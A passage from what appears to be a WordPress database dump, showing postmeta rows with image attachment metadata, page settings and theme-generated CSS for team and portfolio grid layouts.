0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(10692,2697,'_wp_page_template','default'),
(10693,2697,'_dt_microsite_primary_menu',''),
(10694,2697,'_dt_microsite_split_left_menu',''),
(10695,2697,'_dt_microsite_split_right_menu',''),
(10696,2697,'_dt_microsite_mobile_menu',''),
(10697,2699,'_wp_attached_file','2022/10/ws9-e1665288401237.jpg'),
(10698,2699,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1218;s:6:\"height\";i:612;s:4:\"file\";s:30:\"2022/10/ws9-e1665288401237.jpg\";s:8:\"filesize\";i:191733;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"ws9-e1665288401237-300x151.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:151;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12548;}s:5:\"large\";a:5:{s:4:\"file\";s:31:\"ws9-e1665288401237-1024x515.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:515;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:77120;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"ws9-e1665288401237-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7212;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:30:\"ws9-e1665288401237-768x386.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:386;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51464;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:16:\"ws9-1536x391.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58134;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:16:\"ws9-2048x521.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:521;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87904;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10699,2699,'_wp_attachment_backup_sizes','a:7:{s:9:\"full-orig\";a:3:{s:5:\"width\";i:2400;s:6:\"height\";i:611;s:4:\"file\";s:7:\"ws9.jpg\";}s:14:\"thumbnail-orig\";a:5:{s:4:\"file\";s:15:\"ws9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4292;}s:11:\"medium-orig\";a:5:{s:4:\"file\";s:14:\"ws9-300x76.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:76;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4896;}s:17:\"medium_large-orig\";a:5:{s:4:\"file\";s:15:\"ws9-768x196.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20482;}s:10:\"large-orig\";a:5:{s:4:\"file\";s:16:\"ws9-1024x261.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:261;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:32131;}s:14:\"1536x1536-orig\";a:5:{s:4:\"file\";s:16:\"ws9-1536x391.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:391;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58134;}s:14:\"2048x2048-orig\";a:5:{s:4:\"file\";s:16:\"ws9-2048x521.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:521;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87904;}}'),
(10700,2697,'_thumbnail_id','2699'),
(10701,2697,'the7_shortcodes_dynamic_css','a:2:{s:32:\"f1695fac8f1315a188d52b90061a6829\";s:6508:\".dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .team-desc {\n  padding: 20px 20px 20px 20px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .team-author-name,\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .team-author-name a {\n  margin-bottom: 0px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .team-author p {\n  margin-bottom: 10px;\n  font-weight: bold;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829  .team-media {\n  padding: 0px 0px 0px 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .dt-css-grid .team-media img {\n  max-width: 100%;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .team-content {\n  margin-bottom: 5px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829  .team-media,\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829  .team-media a.rollover,\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829  .team-media a.rollover *,\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829  .team-media img {\n  border-radius: 0px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico {\n  margin-bottom: 15px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a {\n  min-width: 26px;\n  min-height: 26px;\n  font-size: 16px;\n  border-radius: 100px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:not(:last-child) {\n  margin-right: 4px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:before,\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:after {\n  min-width: 26px;\n  min-height: 26px;\n  padding: inherit;\n}\n.dt-icon-border-on.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:before {\n  border: 0px solid transparent;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:hover {\n  font-size: 16px;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:hover .soc-font-icon {\n  color: rgba(255,255,255,0.75);\n  background: none;\n}\n.dt-icon-border-hover-on.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:after {\n  border: 0px solid transparent;\n}\n#page .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a:not(:hover) .soc-font-icon {\n  color: #ffffff;\n  background: none;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .soc-ico a .soc-font-icon {\n  font-size: 16px;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n@media screen and (max-width: 1199px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n}\n@media screen and (max-width: 991px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n}\n@media screen and (max-width: 767px) {\n  .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .dt-team-shortcode.team-masonry-shortcode-id-f1695fac8f1315a188d52b90061a6829.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n}\n\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(10702,2705,'_edit_lock','1665765588:1'),
(10703,2706,'_wp_attached_file','2022/10/w91-e1665756338439.jpg'),
(10704,2706,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:200;s:6:\"height\";i:206;s:4:\"file\";s:30:\"2022/10/w91-e1665756338439.jpg\";s:8:\"filesize\";i:100830;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:30:\"w91-e1665290087731-291x300.jpg\";s:5:\"width\";i:291;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13635;}s:5:\"large\";a:5:{s:4:\"file\";s:16:\"w91-1024x256.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:256;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13652;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:30:\"w91-e1665756338439-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4821;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:15:\"w91-768x192.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:192;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8754;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:16:\"w91-1536x383.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:383;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26102;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:16:\"w91-2048x511.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:511;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:42453;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
